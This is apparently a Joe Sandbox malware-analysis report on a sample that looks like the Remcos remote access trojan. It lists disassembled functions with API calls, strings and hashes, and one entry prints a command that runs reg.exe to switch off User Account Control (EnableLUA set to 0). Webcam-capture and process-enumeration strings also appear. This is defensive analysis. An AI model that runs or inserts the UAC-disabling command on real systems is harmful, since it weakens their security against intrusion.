API ID: File$CloseCreateHandleSizeSleep
String ID: `AG
API String ID: 1958988193-3058481221
Opcode ID: 4a18a9f6f4f0e340435ada50215162806d73dcfc16c0deab3260c6edf70966eb
Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
Opcode Fuzzy Hash: 4a18a9f6f4f0e340435ada50215162806d73dcfc16c0deab3260c6edf70966eb
Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

Function 02479FFE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0247A0D6), ref: 0247A034
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0247A0D6), ref: 0247A043
Sleep.KERNEL32(00002710,?,?,?,0247A0D6), ref: 0247A070
CloseHandle.KERNEL32(00000000,?,?,?,0247A0D6), ref: 0247A077

Strings

`AG, xrefs: 0247A029

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: `AG
API String ID: 1958988193-3058481221
Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
Instruction ID: 8ddb6d92f6ed9c5a5ecead808b2206704420ac7bfd9f7962b10327eda9927b21
Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
Instruction Fuzzy Hash: 4D110D302047D06EDB31AF64998CABF3B9BA78A315F440D2EF19552691C76198C4CB69

Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041CA6C
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
GetLastError.KERNEL32 ref: 0041CA91

Strings

MsgWindowClass, xrefs: 0041CA28
0, xrefs: 0041CA2D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5

Function 0248CC86 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0248CCD3
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0248CCEE
GetLastError.KERNEL32 ref: 0248CCF8

Strings

MsgWindowClass, xrefs: 0248CC8F
0, xrefs: 0248CC94

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
Instruction ID: f9ff8b56885c5f86fe8ac7946b5061990bfceb8c07745a77a04f55bd05883b0c
Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
Instruction Fuzzy Hash: 88014CB1D1431DAB8B00DFD9ECC49EFBBBDFE49255B50453AF400B2200E7704A448BA0

Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
CloseHandle.KERNEL32(?), ref: 00406A0F
CloseHandle.KERNEL32(?), ref: 00406A14

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
C:\Windows\System32\cmd.exe, xrefs: 004069FB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 81ebd8890b0950affddf1bb8ee051062daf429c3f336383d22a360a46bc887e0
Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
Opcode Fuzzy Hash: 81ebd8890b0950affddf1bb8ee051062daf429c3f336383d22a360a46bc887e0
Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9

Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F

Strings

CorExitProcess, xrefs: 00442604
mscoree.dll, xrefs: 004425F2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C

Function 024829DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 024829E6
RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0247E832,pth_unenc,004742E0), ref: 02482A14
RegCloseKey.ADVAPI32(?,?,0247E832,pth_unenc,004742E0), ref: 02482A1F

Strings

BG, xrefs: 024829E0, 02482A11, 024829E3
pth_unenc, xrefs: 024829DF

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc$BG
API String ID: 1818849710-2233081382
Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
Instruction ID: d1213d9a2f0dce366ddeddcc9d97c4164ca5ad3c7d450cd176dbd8aec268e284
Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
Instruction Fuzzy Hash: 59F06D71540218BBDF10EBA0ED55FEE376DEF00B80F004525F902A61A1E6B1DB04DA60

Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,008E54D8,0040483F,00000001,?,00000000,00401913), ref: 00404AED
SetEvent.KERNEL32(?,?,00000000,00401913), ref: 00404AF9
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00401913), ref: 00404B04
CloseHandle.KERNEL32(?,?,00000000,00401913), ref: 00404B0D

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

KeepAlive | Disabled, xrefs: 00404AC6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: be5f9c6fe4c4c3ab2425d129c1f16fb8e343b85419f062c206cfa9b62e194523
Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
Opcode Fuzzy Hash: be5f9c6fe4c4c3ab2425d129c1f16fb8e343b85419f062c206cfa9b62e194523
Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B

Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
Sleep.KERNEL32(00002710), ref: 00419F79
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82

Strings

Alarm triggered, xrefs: 00419F3B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 69d5291e15693288b4d3e9b4f6d1ae394db74f315fb7dff35188cd3ac97623b5
Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
Opcode Fuzzy Hash: 69d5291e15693288b4d3e9b4f6d1ae394db74f315fb7dff35188cd3ac97623b5
Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB

Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9

Function 024B03D1 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
Instruction ID: e619f0d5d0696c8eff0a13020501fe2e1e2d4f8a756534d3614b80fbb7fc50f5
Opcode Fuzzy Hash: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
Instruction Fuzzy Hash: D671B471901216DBCF22CF69C884AFFBB75EF51766F14622BE85167290D7708982CBB0

Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000,00473D54,00000000), ref: 004105BF

GetNativeSystemInfo.KERNEL32(?,?,00000000,00473D54,00000000,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410C2A
RtlAllocateHeap.KERNEL32(00000000), ref: 00410C31
SetLastError.KERNEL32(0000045A), ref: 00410D3F
SetLastError.KERNEL32(000000C1,?,00000000,00473D54,00000000,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
String ID:
API String ID: 4001361727-0
Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99

Function 024B41E2 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B6D66: RtlAllocateHeap.NTDLL(00000000,024A468A,?), ref: 024B6D98

_free.LIBCMT ref: 024B42ED
_free.LIBCMT ref: 024B4304
_free.LIBCMT ref: 024B4323
_free.LIBCMT ref: 024B433E
_free.LIBCMT ref: 024B4355

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
Instruction ID: b5af3725781da7e8e16ad4b3dccd236e321f6f32dcac9661eab11ce911d45f34
Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
Instruction Fuzzy Hash: 2451C331A00204AFDB26DF6AD851BEB77F9EF44724F18056EE809DB251E775D901CBA0

Function 024B8276 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 024B82E0
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 024B8358
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 024B8385
_free.LIBCMT ref: 024B82CE

Part of subcall function 024B6D2C: HeapFree.KERNEL32(00000000,00000000,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?), ref: 024B6D42
Part of subcall function 024B6D2C: GetLastError.KERNEL32(?,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?,?), ref: 024B6D54

_free.LIBCMT ref: 024B849A

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction ID: 7989e2b21c4589d31e2777738fab7cc994e0a5970d31948ed006f25c18380919
Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction Fuzzy Hash: 60510771900209EFCB26EF69DC809EEB7BDEF40360B10466FE459972A0E7719981CB64

Function 00403DE7 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 135sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00403E8A

Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2

Strings

GetFrame, xrefs: 00403F65
OpenCamera, xrefs: 00403F48
CloseCamera, xrefs: 00403F54
FreeFrame, xrefs: 00403F76

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: 4c962d6103e1b7d33c2f596f2c4253ef902d4958c906897e38f77ad8d76220a5
Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
Opcode Fuzzy Hash: 4c962d6103e1b7d33c2f596f2c4253ef902d4958c906897e38f77ad8d76220a5
Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF

Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,00000001,0040C914,WinDir,00000000,00000000), ref: 0041B16C
Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,00000001,0040C914,WinDir,00000000,00000000), ref: 0041B173

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
CloseHandle.KERNEL32(00000000), ref: 0040E8AB

Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7

Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: 00479fe0e072848b8f7b1aa7f0c8b3589860f6c9177b06a8cbdbac7edbdea1f6
Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
Opcode Fuzzy Hash: 00479fe0e072848b8f7b1aa7f0c8b3589860f6c9177b06a8cbdbac7edbdea1f6
Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A

Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044310A
_free.LIBCMT ref: 0044312A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84

Function 024B32FF Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024B3371
_free.LIBCMT ref: 024B3391

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction ID: 3b764b2b7a236a2aa3ec934296c5df0a8ca446ace3937280dddc0cbcf00e8802
Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction Fuzzy Hash: 7741F332A002049FDB21DF7AC890A9EBBB6EF84714F1585AEE915EB341DB71E901CB50

Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
__alloca_probe_16.LIBCMT ref: 0044FF58
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
__freea.LIBCMT ref: 0044FFC4

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: cdc0211367214f020165e67543332c62bf0c6332f119fa8fe35dda7cd00c680f
Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
Opcode Fuzzy Hash: cdc0211367214f020165e67543332c62bf0c6332f119fa8fe35dda7cd00c680f
Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4

Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044E144
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
_free.LIBCMT ref: 0044E1A0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

